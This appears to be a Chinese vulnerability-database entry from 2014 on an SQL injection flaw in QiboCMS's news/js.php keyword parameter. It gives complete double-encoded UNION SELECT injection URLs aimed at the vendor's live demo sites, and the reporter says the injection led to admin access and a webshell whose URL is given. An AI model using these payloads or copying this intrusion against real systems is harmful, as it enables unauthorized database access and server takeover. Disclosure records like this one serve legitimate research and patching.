qibocms企业SQL注入一枚(demo站未更新补丁)

基本字段

漏洞编号:
SSV-94166
披露/发现时间:
2014-05-17
提交时间:
2014-05-17
漏洞等级:
漏洞类别:
其他类型
影响组件:
QiboCMS
漏洞作者:
′雨。
提交者:
Knownsec
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 Knownsec 共获得  0KB

简要描述:

跟之前的b2b差不多。

详细说明:

今天在官网上下了下b2b的源码 看是怎么修补的。 //$keyword=urldecode($keyword); 是直接把解码的地方给注释掉了。 再测试一下b2b的demo http://b2b.qibosoft.com/news/js.php?type=like&keyword=123%%2527%29/**/union/**/select/**/1,user%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23 但是demo 还是没有更新。 还能够注入。 demo为毛不更新呢? 我会说根据这注入我拿到了后台又拿到了shell? http://b2b.qibosoft.com/yu.php 你们自己把这个shell删掉一下把,我没搞破坏。


再在官网上下了一个企业系统。

if($keyword){
            $SQL.=" AND ( ";
            $keyword=urldecode($keyword);
            $detail=explode(" ",$keyword);

发现这个没注释掉。 继续来注入把。 http://qy.qibosoft.com/news/js.php?type=like&keyword=123%%2527%29/**/union/**/select/**/1,user%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23

漏洞证明:

http://qy.qibosoft.com/news/js.php?type=like&keyword=123%%2527%29/**/union/**/select/**/1,user%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23

共 0  兑换了

PoC

暂无 PoC

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

人气 756
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负